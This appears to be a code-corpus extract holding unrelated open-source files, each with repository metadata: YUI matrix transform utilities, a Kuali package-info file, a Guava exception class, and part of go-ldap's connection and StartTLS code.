var deg = rad * (180 / Math.PI);
return deg;
},
/**
* Converts a degree value to a radian.
*
* @method deg2rad
* @param {Number} deg Degree value to be converted to radian.
* @return Number
*/
deg2rad: function(deg) {
var rad = deg * (Math.PI / 180);
return rad;
},
    /**
     * Converts an angle to a radian. Accepts a number/numeric string of
     * degrees (the default), or a string containing "rad" (e.g. "1.5rad")
     * which is parsed as radians directly.
     *
     * @method angle2rad
     * @param {Object} val Value to be converted to radian.
     * @return Number
     */
    angle2rad: function(val) {
        if (typeof val === 'string' && val.indexOf('rad') > -1) {
            val = parseFloat(val);
        } else { // default to deg
            val = MatrixUtil.deg2rad(parseFloat(val));
        }

        return val;
    },
/**
* Converts a transform object to an array of column vectors.
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* \ /
*
* @method getnxn
* @return Array
*/
convertTransformToArray: function(matrix)
{
var matrixArray = [
[matrix.a, matrix.c, matrix.dx],
[matrix.b, matrix.d, matrix.dy],
[0, 0, 1]
];
return matrixArray;
},
/**
* Returns the determinant of a given matrix.
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* | matrix[0][3] matrix[1][3] matrix[2][3] |
* \ /
*
* @method getDeterminant
* @param {Array} matrix An nxn matrix represented an array of vector (column) arrays. Each vector array has index for each row.
* @return Number
*/
getDeterminant: function(matrix)
{
var determinant = 0,
len = matrix.length,
i = 0,
multiplier;
if(len == 2)
{
return matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0];
}
for(; i < len; ++i)
{
multiplier = matrix[i][0];
if(i % 2 === 0 || i === 0)
{
determinant += multiplier * MatrixUtil.getDeterminant(MatrixUtil.getMinors(matrix, i, 0));
}
else
{
determinant -= multiplier * MatrixUtil.getDeterminant(MatrixUtil.getMinors(matrix, i, 0));
}
}
return determinant;
},
/**
* Returns the inverse of a matrix
*
* @method inverse
* @param Array matrix An array representing an nxn matrix
* @return Array
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* | matrix[0][3] matrix[1][3] matrix[2][3] |
* \ /
*/
inverse: function(matrix)
{
var determinant = 0,
len = matrix.length,
i = 0,
j,
inverse,
adjunct = [],
//vector representing 2x2 matrix
minor = [];
if(len === 2)
{
determinant = matrix[0][0] * matrix[1][1] - matrix[0][1] * matrix[1][0];
inverse = [
[matrix[1][1] * determinant, -matrix[1][0] * determinant],
[-matrix[0][1] * determinant, matrix[0][0] * determinant]
];
}
else
{
determinant = MatrixUtil.getDeterminant(matrix);
for(; i < len; ++i)
{
adjunct[i] = [];
for(j = 0; j < len; ++j)
{
minor = MatrixUtil.getMinors(matrix, j, i);
adjunct[i][j] = MatrixUtil.getDeterminant(minor);
if((i + j) % 2 !== 0 && (i + j) !== 0)
{
adjunct[i][j] *= -1;
}
}
}
inverse = MatrixUtil.scalarMultiply(adjunct, 1/determinant);
}
return inverse;
},
/**
* Multiplies a matrix by a numeric value.
*
* @method scalarMultiply
* @param {Array} matrix The matrix to be altered.
* @param {Number} multiplier The number to multiply against the matrix.
* @return Array
*/
scalarMultiply: function(matrix, multiplier)
{
var i = 0,
j,
len = matrix.length;
for(; i < len; ++i)
{
for(j = 0; j < len; ++j)
{
matrix[i][j] = MatrixUtil._round(matrix[i][j] * multiplier);
}
}
return matrix;
},
/**
* Returns the transpose for an nxn matrix.
*
* @method transpose
* @param matrix An nxn matrix represented by an array of vector arrays.
* @return Array
*/
transpose: function(matrix)
{
var len = matrix.length,
i = 0,
j = 0,
transpose = [];
for(; i < len; ++i)
{
transpose[i] = [];
for(j = 0; j < len; ++j)
{
transpose[i].push(matrix[j][i]);
}
}
return transpose;
},
    /**
     * Returns a matrix of minors based on a matrix, column index and row index.
     *
     * @method getMinors
     * @param {Array} matrix The matrix from which to extract the matrix of minors.
     * @param {Number} columnIndex A zero-based index representing the specified column to exclude.
     * @param {Number} rowIndex A zero-based index representing the specified row to exclude.
     * @return Array
     */
    getMinors: function(matrix, columnIndex, rowIndex)
    {
        var minors = [],
            len = matrix.length,
            i = 0,
            j,
            column;
        for(; i < len; ++i)
        {
            // Skip the excluded outer index; copy every inner element except
            // the excluded one.
            if(i !== columnIndex)
            {
                column = [];
                for(j = 0; j < len; ++j)
                {
                    if(j !== rowIndex)
                    {
                        column.push(matrix[i][j]);
                    }
                }
                minors.push(column);
            }
        }
        return minors;
    },
/**
* Returns the sign of value
*
* @method sign
* @param {Number} val value to be interpreted
* @return Number
*/
sign: function(val)
{
return val === 0 ? 1 : val/Math.abs(val);
},
/**
* Multiplies a vector and a matrix
*
* @method vectorMatrixProduct
* @param {Array} vector Array representing a column vector
* @param {Array} matrix Array representing an nxn matrix
* @return Array
*/
vectorMatrixProduct: function(vector, matrix)
{
var i,
j,
len = vector.length,
product = [],
rowProduct;
for(i = 0; i < len; ++i)
{
rowProduct = 0;
for(j = 0; j < len; ++j)
{
rowProduct += vector[i] * matrix[i][j];
}
product[i] = rowProduct;
}
return product;
},
/**
* Breaks up a 2d transform matrix into a series of transform operations.
*
* @method decompose
* @param {Array} 3x3 matrix array
* @return Array
*/
decompose: function(matrix)
{
var a = parseFloat(matrix[0][0]),
b = parseFloat(matrix[1][0]),
c = parseFloat(matrix[0][1]),
d = parseFloat(matrix[1][1]),
dx = parseFloat(matrix[0][2]),
dy = parseFloat(matrix[1][2]),
rotate,
sx,
sy,
shear;
if((a * d - b * c) === 0)
{
return false;
}
//get length of vector(ab)
sx = MatrixUtil._round(Math.sqrt(a * a + b * b));
//normalize components of vector(ab)
a /= sx;
b /= sx;
shear = MatrixUtil._round(a * c + b * d);
c -= a * shear;
d -= b * shear;
//get length of vector(cd)
sy = MatrixUtil._round(Math.sqrt(c * c + d * d));
//normalize components of vector(cd)
c /= sy;
d /= sy;
shear /=sy;
shear = MatrixUtil._round(MatrixUtil.rad2deg(Math.atan(shear)));
rotate = MatrixUtil._round(MatrixUtil.rad2deg(Math.atan2(matrix[1][0], matrix[0][0])));
return [
["translate", dx, dy],
["rotate", rotate],
["skewX", shear],
["scale", sx, sy]
];
},
/**
* Parses a transform string and returns an array of transform arrays.
*
* @method getTransformArray
* @param {String} val A transform string
* @return Array
*/
getTransformArray: function(transform) {
var re = /\s*([a-z]*)\(([\w,\.,\-,\s]*)\)/gi,
transforms = [],
args,
m,
decomp,
methods = MatrixUtil.transformMethods;
while ((m = re.exec(transform))) {
if (methods.hasOwnProperty(m[1]))
{
args = m[2].split(',');
args.unshift(m[1]);
transforms.push(args);
}
else if(m[1] == "matrix")
{
args = m[2].split(',');
decomp = MatrixUtil.decompose([
[args[0], args[2], args[4]],
[args[1], args[3], args[5]],
[0, 0, 1]
]);
transforms.push(decomp[0]);
transforms.push(decomp[1]);
transforms.push(decomp[2]);
transforms.push(decomp[3]);
}
}
return transforms;
},
/**
* Returns an array of transform arrays representing transform functions and arguments.
*
* @method getTransformFunctionArray
* @return Array
*/
getTransformFunctionArray: function(transform) {
var list;
switch(transform)
{
case "skew" :
list = [transform, 0, 0];
break;
case "scale" :
list = [transform, 1, 1];
break;
case "scaleX" :
list = [transform, 1];
break;
case "scaleY" :
list = [transform, 1];
break;
case "translate" :
list = [transform, 0, 0];
break;
default :
list = [transform, 0];
break;
}
return list;
},
/**
* Compares to arrays or transform functions to ensure both contain the same functions in the same
* order.
*
* @method compareTransformSequence
* @param {Array} list1 Array to compare
* @param {Array} list2 Array to compare
* @return Boolean
*/
compareTransformSequence: function(list1, list2)
{
var i = 0,
len = list1.length,
len2 = list2.length,
isEqual = len === len2;
if(isEqual)
{
for(; i < len; ++i)
{
if(list1[i][0] != list2[i][0])
{
isEqual = false;
break;
}
}
}
return isEqual;
},
/**
* Mapping of possible transform method names.
*
* @property transformMethods
* @type Object
*/
transformMethods: {
rotate: "rotate",
skew: "skew",
skewX: "skewX",
skewY: "skewY",
translate: "translate",
translateX: "translateX",
translateY: "tranlsateY",
scale: "scale",
scaleX: "scaleX",
scaleY: "scaleY"
}
};
Y.MatrixUtil = MatrixUtil;
/**
* Matrix is a class that allows for the manipulation of a transform matrix.
* This class is a work in progress.
*
* @class Matrix
* @constructor
* @module matrix
*/
var Matrix = function(config) {
this.init(config);
};
Matrix.prototype = {
/**
* Used as value for the _rounding method.
*
* @property _rounder
* @private
*/
_rounder: 100000,
/**
* Updates the matrix.
*
* @method multiple
* @param {Number} a
* @param {Number} b
* @param {Number} c
* @param {Number} d
* @param {Number} dx
* @param {Number} dy
*/
multiply: function(a, b, c, d, dx, dy) {
var matrix = this,
matrix_a = matrix.a * a + matrix.c * b,
matrix_b = matrix.b * a + matrix.d * b,
matrix_c = matrix.a * c + matrix.c * d,
matrix_d = matrix.b * c + matrix.d * d,
matrix_dx = matrix.a * dx + matrix.c * dy + matrix.dx,
matrix_dy = matrix.b * dx + matrix.d * dy + matrix.dy;
matrix.a = this._round(matrix_a);
matrix.b = this._round(matrix_b);
matrix.c = this._round(matrix_c);
matrix.d = this._round(matrix_d);
matrix.dx = this._round(matrix_dx);
matrix.dy = this._round(matrix_dy);
return this;
},
/**
* Parses a string and updates the matrix.
*
* @method applyCSSText
* @param {String} val A css transform string
*/
applyCSSText: function(val) {
var re = /\s*([a-z]*)\(([\w,\.,\-,\s]*)\)/gi,
args,
m;
val = val.replace(/matrix/g, "multiply");
while ((m = re.exec(val))) {
if (typeof this[m[1]] === 'function') {
args = m[2].split(',');
this[m[1]].apply(this, args);
}
}
},
/**
* Parses a string and returns an array of transform arrays.
*
* @method getTransformArray
* @param {String} val A css transform string
* @return Array
*/
getTransformArray: function(val) {
var re = /\s*([a-z]*)\(([\w,\.,\-,\s]*)\)/gi,
transforms = [],
args,
m;
val = val.replace(/matrix/g, "multiply");
while ((m = re.exec(val))) {
if (typeof this[m[1]] === 'function') {
args = m[2].split(',');
args.unshift(m[1]);
transforms.push(args);
}
}
return transforms;
},
/**
* Default values for the matrix
*
* @property _defaults
* @private
*/
_defaults: {
a: 1,
b: 0,
c: 0,
d: 1,
dx: 0,
dy: 0
},
/**
* Rounds values
*
* @method _round
* @private
*/
_round: function(val) {
val = Math.round(val * this._rounder) / this._rounder;
return val;
},
/**
* Initializes a matrix.
*
* @method init
* @param {Object} config Specified key value pairs for matrix properties. If a property is not explicitly defined in the config argument,
* the default value will be used.
*/
init: function(config) {
var defaults = this._defaults,
prop;
config = config || {};
for (prop in defaults) {
if(defaults.hasOwnProperty(prop))
{
this[prop] = (prop in config) ? config[prop] : defaults[prop];
}
}
this._config = config;
},
/**
* Applies a scale transform
*
* @method scale
* @param {Number} val
*/
scale: function(x, y) {
this.multiply(x, 0, 0, y, 0, 0);
return this;
},
/**
* Applies a skew transformation.
*
* @method skew
* @param {Number} x The value to skew on the x-axis.
* @param {Number} y The value to skew on the y-axis.
*/
skew: function(x, y) {
x = x || 0;
y = y || 0;
if (x !== undefined) { // null or undef
x = Math.tan(this.angle2rad(x));
}
if (y !== undefined) { // null or undef
y = Math.tan(this.angle2rad(y));
}
this.multiply(1, y, x, 1, 0, 0);
return this;
},
/**
* Applies a skew to the x-coordinate
*
* @method skewX
* @param {Number} x x-coordinate
*/
skewX: function(x) {
this.skew(x);
return this;
},
/**
* Applies a skew to the y-coordinate
*
* @method skewY
* @param {Number} y y-coordinate
*/
skewY: function(y) {
this.skew(null, y);
return this;
},
/**
* Returns a string of text that can be used to populate a the css transform property of an element.
*
* @method toCSSText
* @return String
*/
toCSSText: function() {
var matrix = this,
text = 'matrix(' +
matrix.a + ',' +
matrix.b + ',' +
matrix.c + ',' +
matrix.d + ',' +
matrix.dx + ',' +
matrix.dy + ')';
return text;
},
/**
* Returns a string that can be used to populate the css filter property of an element.
*
* @method toFilterText
* @return String
*/
toFilterText: function() {
var matrix = this,
text = 'progid:DXImageTransform.Microsoft.Matrix(';
text += 'M11=' + matrix.a + ',' +
'M21=' + matrix.b + ',' +
'M12=' + matrix.c + ',' +
'M22=' + matrix.d + ',' +
'sizingMethod="auto expand")';
text += '';
return text;
},
/**
* Converts a radian value to a degree.
*
* @method rad2deg
* @param {Number} rad Radian value to be converted.
* @return Number
*/
rad2deg: function(rad) {
var deg = rad * (180 / Math.PI);
return deg;
},
/**
* Converts a degree value to a radian.
*
* @method deg2rad
* @param {Number} deg Degree value to be converted to radian.
* @return Number
*/
deg2rad: function(deg) {
var rad = deg * (Math.PI / 180);
return rad;
},
angle2rad: function(val) {
if (typeof val === 'string' && val.indexOf('rad') > -1) {
val = parseFloat(val);
} else { // default to deg
val = this.deg2rad(parseFloat(val));
}
return val;
},
    /**
     * Applies a rotate transform about the origin.
     *
     * @method rotate
     * @param {Number} deg The degree of the rotation.
     * @param {Number} x Unused — accepted but never read; rotation is not
     *     performed about (x, y). NOTE(review): kept for call-site
     *     compatibility; confirm before relying on it.
     * @param {Number} y Unused (see x).
     */
    rotate: function(deg, x, y) {
        var rad = this.angle2rad(deg),
            sin = Math.sin(rad),
            cos = Math.cos(rad);
        this.multiply(cos, sin, 0 - sin, cos, 0, 0);
        return this;
    },
/**
* Applies translate transformation.
*
* @method translate
* @param {Number} x The value to transate on the x-axis.
* @param {Number} y The value to translate on the y-axis.
*/
translate: function(x, y) {
x = parseFloat(x) || 0;
y = parseFloat(y) || 0;
this.multiply(1, 0, 0, 1, x, y);
return this;
},
/**
* Applies a translate to the x-coordinate
*
* @method translateX
* @param {Number} x x-coordinate
*/
translateX: function(x) {
this.translate(x);
return this;
},
/**
* Applies a translate to the y-coordinate
*
* @method translateY
* @param {Number} y y-coordinate
*/
translateY: function(y) {
this.translate(null, y);
return this;
},
/**
* Returns an identity matrix.
*
* @method identity
* @return Object
*/
identity: function() {
var config = this._config,
defaults = this._defaults,
prop;
for (prop in config) {
if (prop in defaults) {
this[prop] = defaults[prop];
}
}
return this;
},
/**
* Returns a 3x3 Matrix array
*
* / \
* | matrix[0][0] matrix[1][0] matrix[2][0] |
* | matrix[0][1] matrix[1][1] matrix[2][1] |
* | matrix[0][2] matrix[1][2] matrix[2][2] |
* \ /
*
* @method getMatrixArray
* @return Array
*/
getMatrixArray: function()
{
var matrix = this,
matrixArray = [
[matrix.a, matrix.c, matrix.dx],
[matrix.b, matrix.d, matrix.dy],
[0, 0, 1]
];
return matrixArray;
},
/**
* Returns the left, top, right and bottom coordinates for a transformed
* item.
*
* @method getContentRect
* @param {Number} width The width of the item.
* @param {Number} height The height of the item.
* @param {Number} x The x-coordinate of the item.
* @param {Number} y The y-coordinate of the item.
* @return Object
*/
getContentRect: function(width, height, x, y)
{
var left = !isNaN(x) ? x : 0,
top = !isNaN(y) ? y : 0,
right = left + width,
bottom = top + height,
matrix = this,
a = matrix.a,
b = matrix.b,
c = matrix.c,
d = matrix.d,
dx = matrix.dx,
dy = matrix.dy,
x1 = (a * left + c * top + dx),
y1 = (b * left + d * top + dy),
//[x2, y2]
x2 = (a * right + c * top + dx),
y2 = (b * right + d * top + dy),
//[x3, y3]
x3 = (a * left + c * bottom + dx),
y3 = (b * left + d * bottom + dy),
//[x4, y4]
x4 = (a * right + c * bottom + dx),
y4 = (b * right + d * bottom + dy);
return {
left: Math.min(x3, Math.min(x1, Math.min(x2, x4))),
right: Math.max(x3, Math.max(x1, Math.max(x2, x4))),
top: Math.min(y2, Math.min(y4, Math.min(y3, y1))),
bottom: Math.max(y2, Math.max(y4, Math.max(y3, y1)))
};
},
/**
* Returns the determinant of the matrix.
*
* @method getDeterminant
* @return Number
*/
getDeterminant: function()
{
return Y.MatrixUtil.getDeterminant(this.getMatrixArray());
},
/**
* Returns the inverse (in array form) of the matrix.
*
* @method inverse
* @return Array
*/
inverse: function()
{
return Y.MatrixUtil.inverse(this.getMatrixArray());
},
/**
* Returns the transpose of the matrix
*
* @method transpose
* @return Array
*/
transpose: function()
{
return Y.MatrixUtil.transpose(this.getMatrixArray());
},
/**
* Returns an array of transform commands that represent the matrix.
*
* @method decompose
* @return Array
*/
decompose: function()
{
return Y.MatrixUtil.decompose(this.getMatrixArray());
}
};
Y.Matrix = Matrix;
}, '3.11.0', {"requires": ["yui-base"]});
| devmix/openjst | server/commons/war/src/main/webapp/ui/lib/yui/build/matrix/matrix.js | JavaScript | agpl-3.0 | 26,090 |
/*
* Kuali Coeus, a comprehensive research administration system for higher education.
*
* Copyright 2005-2016 Kuali, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
*
* Kuali Coeus Common Framework
*
* @author Kuali Coeus Development Team
*
*/
package org.kuali.coeus.common.framework;
| mukadder/kc | coeus-impl/src/main/java/org/kuali/coeus/common/framework/package-info.java | Java | agpl-3.0 | 937 |
/*
* Copyright (C) 2006 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google_voltpatches.common.util.concurrent;
import com.google_voltpatches.common.annotations.GwtIncompatible;
import javax.annotation_voltpatches.Nullable;
/**
* Unchecked version of {@link java.util.concurrent.TimeoutException}.
*
* @author Kevin Bourrillion
* @since 1.0
*/
@GwtIncompatible
public class UncheckedTimeoutException extends RuntimeException {
  /** Constructs an exception with no detail message and no cause. */
  public UncheckedTimeoutException() {}

  /** Constructs an exception with the given detail message and no cause. */
  public UncheckedTimeoutException(@Nullable String message) {
    super(message);
  }

  /** Constructs an exception with no detail message and the given cause. */
  public UncheckedTimeoutException(@Nullable Throwable cause) {
    super(cause);
  }

  /** Constructs an exception with the given detail message and cause. */
  public UncheckedTimeoutException(@Nullable String message, @Nullable Throwable cause) {
    super(message, cause);
  }

  private static final long serialVersionUID = 0;
}
| migue/voltdb | third_party/java/src/com/google_voltpatches/common/util/concurrent/UncheckedTimeoutException.java | Java | agpl-3.0 | 1,363 |
package ldap
import (
"bufio"
"crypto/tls"
"errors"
"fmt"
"log"
"net"
"net/url"
"sync"
"sync/atomic"
"time"
ber "github.com/go-asn1-ber/asn1-ber"
)
const (
// MessageQuit causes the processMessages loop to exit
MessageQuit = 0
// MessageRequest sends a request to the server
MessageRequest = 1
// MessageResponse receives a response from the server
MessageResponse = 2
// MessageFinish indicates the client considers a particular message ID to be finished
MessageFinish = 3
// MessageTimeout indicates the client-specified timeout for a particular message ID has been reached
MessageTimeout = 4
)
const (
// DefaultLdapPort default ldap port for pure TCP connection
DefaultLdapPort = "389"
// DefaultLdapsPort default ldap port for SSL connection
DefaultLdapsPort = "636"
)
// PacketResponse contains the packet or error encountered reading a response
type PacketResponse struct {
// Packet is the packet read from the server
Packet *ber.Packet
// Error is an error encountered while reading
Error error
}
// ReadPacket returns the packet or an error.
// A nil receiver, or a response carrying neither a packet nor an error,
// yields an ErrorNetwork-wrapped error instead.
func (pr *PacketResponse) ReadPacket() (*ber.Packet, error) {
	if pr != nil && (pr.Packet != nil || pr.Error != nil) {
		return pr.Packet, pr.Error
	}
	return nil, NewError(ErrorNetwork, errors.New("ldap: could not retrieve response"))
}
type messageContext struct {
id int64
// close(done) should only be called from finishMessage()
done chan struct{}
// close(responses) should only be called from processMessages(), and only sent to from sendResponse()
responses chan *PacketResponse
}
// sendResponse should only be called within the processMessages() loop which
// is also responsible for closing the responses channel.
func (msgCtx *messageContext) sendResponse(packet *PacketResponse) {
select {
case msgCtx.responses <- packet:
// Successfully sent packet to message handler.
case <-msgCtx.done:
// The request handler is done and will not receive more
// packets.
}
}
type messagePacket struct {
Op int
MessageID int64
Packet *ber.Packet
Context *messageContext
}
type sendMessageFlags uint
const (
startTLS sendMessageFlags = 1 << iota
)
// Conn represents an LDAP Connection
type Conn struct {
// requestTimeout is loaded atomically
// so we need to ensure 64-bit alignment on 32-bit platforms.
requestTimeout int64
conn net.Conn
isTLS bool
closing uint32
closeErr atomic.Value
isStartingTLS bool
Debug debugging
chanConfirm chan struct{}
messageContexts map[int64]*messageContext
chanMessage chan *messagePacket
chanMessageID chan int64
wgClose sync.WaitGroup
outstandingRequests uint
messageMutex sync.Mutex
}
var _ Client = &Conn{}
// DefaultTimeout is a package-level variable that sets the timeout value
// used for the Dial and DialTLS methods.
//
// WARNING: since this is a package-level variable, setting this value from
// multiple places will probably result in undesired behaviour.
var DefaultTimeout = 60 * time.Second
// DialOpt configures DialContext.
type DialOpt func(*DialContext)
// DialWithDialer updates net.Dialer in DialContext.
func DialWithDialer(d *net.Dialer) DialOpt {
return func(dc *DialContext) {
dc.d = d
}
}
// DialWithTLSConfig updates tls.Config in DialContext.
func DialWithTLSConfig(tc *tls.Config) DialOpt {
return func(dc *DialContext) {
dc.tc = tc
}
}
// DialWithTLSDialer is a wrapper for DialWithTLSConfig with the option to
// specify a net.Dialer to for example define a timeout or a custom resolver.
func DialWithTLSDialer(tlsConfig *tls.Config, dialer *net.Dialer) DialOpt {
return func(dc *DialContext) {
dc.tc = tlsConfig
dc.d = dialer
}
}
// DialContext contains necessary parameters to dial the given ldap URL.
type DialContext struct {
d *net.Dialer
tc *tls.Config
}
// dial opens a network connection for the parsed LDAP URL, choosing the
// transport by scheme: unix socket for ldapi, plain TCP for ldap, and TLS
// for ldaps. Missing ports fall back to the scheme's default.
func (dc *DialContext) dial(u *url.URL) (net.Conn, error) {
	if u.Scheme == "ldapi" {
		// An empty (or bare "/") path falls back to the conventional slapd
		// socket location.
		if u.Path == "" || u.Path == "/" {
			u.Path = "/var/run/slapd/ldapi"
		}
		return dc.d.Dial("unix", u.Path)
	}

	host, port, err := net.SplitHostPort(u.Host)
	if err != nil {
		// we assume that error is due to missing port
		host = u.Host
		port = ""
	}

	switch u.Scheme {
	case "ldap":
		if port == "" {
			port = DefaultLdapPort
		}
		return dc.d.Dial("tcp", net.JoinHostPort(host, port))
	case "ldaps":
		if port == "" {
			port = DefaultLdapsPort
		}
		// dc.tc may be nil here (no DialWithTLSConfig option given), in which
		// case tls.DialWithDialer applies its default configuration.
		return tls.DialWithDialer(dc.d, "tcp", net.JoinHostPort(host, port), dc.tc)
	}

	return nil, fmt.Errorf("Unknown scheme '%s'", u.Scheme)
}
// Dial connects to the given address on the given network using net.Dial
// and then returns a new Conn for the connection.
// @deprecated Use DialURL instead.
func Dial(network, addr string) (*Conn, error) {
c, err := net.DialTimeout(network, addr, DefaultTimeout)
if err != nil {
return nil, NewError(ErrorNetwork, err)
}
conn := NewConn(c, false)
conn.Start()
return conn, nil
}
// DialTLS connects to the given address on the given network using tls.Dial
// and then returns a new Conn for the connection.
// @deprecated Use DialURL instead.
func DialTLS(network, addr string, config *tls.Config) (*Conn, error) {
c, err := tls.DialWithDialer(&net.Dialer{Timeout: DefaultTimeout}, network, addr, config)
if err != nil {
return nil, NewError(ErrorNetwork, err)
}
conn := NewConn(c, true)
conn.Start()
return conn, nil
}
// DialURL connects to the given ldap URL.
// The following schemas are supported: ldap://, ldaps://, ldapi://.
// On success a new Conn for the connection is returned.
func DialURL(addr string, opts ...DialOpt) (*Conn, error) {
	parsed, parseErr := url.Parse(addr)
	if parseErr != nil {
		return nil, NewError(ErrorNetwork, parseErr)
	}

	// Apply caller-supplied options, then fill in the default dialer if none
	// was provided.
	dc := DialContext{}
	for _, configure := range opts {
		configure(&dc)
	}
	if dc.d == nil {
		dc.d = &net.Dialer{Timeout: DefaultTimeout}
	}

	netConn, dialErr := dc.dial(parsed)
	if dialErr != nil {
		return nil, NewError(ErrorNetwork, dialErr)
	}

	conn := NewConn(netConn, parsed.Scheme == "ldaps")
	conn.Start()
	return conn, nil
}
// NewConn returns a new Conn using conn for network I/O.
func NewConn(conn net.Conn, isTLS bool) *Conn {
return &Conn{
conn: conn,
chanConfirm: make(chan struct{}),
chanMessageID: make(chan int64),
chanMessage: make(chan *messagePacket, 10),
messageContexts: map[int64]*messageContext{},
requestTimeout: 0,
isTLS: isTLS,
}
}
// Start initializes goroutines to read responses and process messages
func (l *Conn) Start() {
l.wgClose.Add(1)
go l.reader()
go l.processMessages()
}
// IsClosing returns whether or not we're currently closing.
func (l *Conn) IsClosing() bool {
return atomic.LoadUint32(&l.closing) == 1
}
// setClosing sets the closing value to true
func (l *Conn) setClosing() bool {
return atomic.CompareAndSwapUint32(&l.closing, 0, 1)
}
// Close closes the connection. It is safe to call more than once: only the
// first caller (the one that flips the closing flag) performs the shutdown;
// every caller blocks until shutdown has completed.
func (l *Conn) Close() {
	l.messageMutex.Lock()
	defer l.messageMutex.Unlock()

	if l.setClosing() {
		l.Debug.Printf("Sending quit message and waiting for confirmation")
		l.chanMessage <- &messagePacket{Op: MessageQuit}
		// Wait for the message loop to acknowledge the quit before closing
		// chanMessage. NOTE(review): chanConfirm is presumably closed by
		// processMessages (not visible here) — confirm.
		<-l.chanConfirm
		close(l.chanMessage)

		l.Debug.Printf("Closing network connection")
		if err := l.conn.Close(); err != nil {
			log.Println(err)
		}

		l.wgClose.Done()
	}
	l.wgClose.Wait()
}
// SetTimeout sets the time after a request is sent that a MessageTimeout triggers
func (l *Conn) SetTimeout(timeout time.Duration) {
if timeout > 0 {
atomic.StoreInt64(&l.requestTimeout, int64(timeout))
}
}
// Returns the next available messageID. Returns 0 as a sentinel when the
// ID channel has been closed (i.e. the connection is shutting down).
func (l *Conn) nextMessageID() int64 {
	if messageID, ok := <-l.chanMessageID; ok {
		return messageID
	}
	return 0
}
// StartTLS sends the command to start a TLS session and then creates a new TLS Client.
// It errors if the connection is already encrypted. On success the underlying
// net.Conn is replaced with a tls.Conn that has completed its handshake.
func (l *Conn) StartTLS(config *tls.Config) error {
	if l.isTLS {
		return NewError(ErrorNetwork, errors.New("ldap: already encrypted"))
	}

	// Build the StartTLS extended request (OID 1.3.6.1.4.1.1466.20037).
	packet := ber.Encode(ber.ClassUniversal, ber.TypeConstructed, ber.TagSequence, nil, "LDAP Request")
	packet.AppendChild(ber.NewInteger(ber.ClassUniversal, ber.TypePrimitive, ber.TagInteger, l.nextMessageID(), "MessageID"))
	request := ber.Encode(ber.ClassApplication, ber.TypeConstructed, ApplicationExtendedRequest, nil, "Start TLS")
	request.AppendChild(ber.NewString(ber.ClassContext, ber.TypePrimitive, 0, "1.3.6.1.4.1.1466.20037", "TLS Extended Command"))
	packet.AppendChild(request)
	l.Debug.PrintPacket(packet)

	// The startTLS flag tells the message layer this request begins TLS
	// negotiation.
	msgCtx, err := l.sendMessageWithFlags(packet, startTLS)
	if err != nil {
		return err
	}
	defer l.finishMessage(msgCtx)

	l.Debug.Printf("%d: waiting for response", msgCtx.id)

	packetResponse, ok := <-msgCtx.responses
	if !ok {
		return NewError(ErrorNetwork, errors.New("ldap: response channel closed"))
	}
	packet, err = packetResponse.ReadPacket()
	l.Debug.Printf("%d: got response %p", msgCtx.id, packet)
	if err != nil {
		return err
	}

	if l.Debug {
		if err := addLDAPDescriptions(packet); err != nil {
			l.Close()
			return err
		}
		l.Debug.PrintPacket(packet)
	}

	if err := GetLDAPError(packet); err == nil {
		// Server accepted: wrap the existing connection in TLS and complete
		// the handshake eagerly so failures surface here, not on first I/O.
		conn := tls.Client(l.conn, config)

		if connErr := conn.Handshake(); connErr != nil {
			l.Close()
			return NewError(ErrorNetwork, fmt.Errorf("TLS handshake failed (%v)", connErr))
		}

		l.isTLS = true
		l.conn = conn
	} else {
		return err
	}
	// Restart the reader on the (now encrypted) connection.
	// NOTE(review): assumes the previous reader goroutine exited during TLS
	// negotiation — confirm against reader()/sendMessageWithFlags.
	go l.reader()

	return nil
}
// TLSConnectionState returns the client's TLS connection state.
// The return values are their zero values if StartTLS did
// not succeed. The type assertion fails on a plain net.Conn,
// yielding the zero state and ok == false.
func (l *Conn) TLSConnectionState() (state tls.ConnectionState, ok bool) {
	tc, ok := l.conn.(*tls.Conn)
	if !ok {
		return
	}
	return tc.ConnectionState(), true
}
// sendMessage queues packet for transmission with no special flags.
func (l *Conn) sendMessage(packet *ber.Packet) (*messageContext, error) {
	return l.sendMessageWithFlags(packet, 0)
}
// sendMessageWithFlags queues packet for transmission after enforcing the
// connection-state rules: no sends while closing or mid-StartTLS, and a
// StartTLS request is only accepted when no other requests are outstanding.
func (l *Conn) sendMessageWithFlags(packet *ber.Packet, flags sendMessageFlags) (*messageContext, error) {
	if l.IsClosing() {
		return nil, NewError(ErrorNetwork, errors.New("ldap: connection closed"))
	}
	l.messageMutex.Lock()
	l.Debug.Printf("flags&startTLS = %d", flags&startTLS)
	if l.isStartingTLS {
		l.messageMutex.Unlock()
		return nil, NewError(ErrorNetwork, errors.New("ldap: connection is in startls phase"))
	}
	if flags&startTLS != 0 {
		if l.outstandingRequests != 0 {
			l.messageMutex.Unlock()
			return nil, NewError(ErrorNetwork, errors.New("ldap: cannot StartTLS with outstanding requests"))
		}
		l.isStartingTLS = true
	}
	l.outstandingRequests++
	l.messageMutex.Unlock()

	responses := make(chan *PacketResponse)
	// The message ID was placed in the packet's first child by the caller.
	messageID := packet.Children[0].Value.(int64)
	message := &messagePacket{
		Op:        MessageRequest,
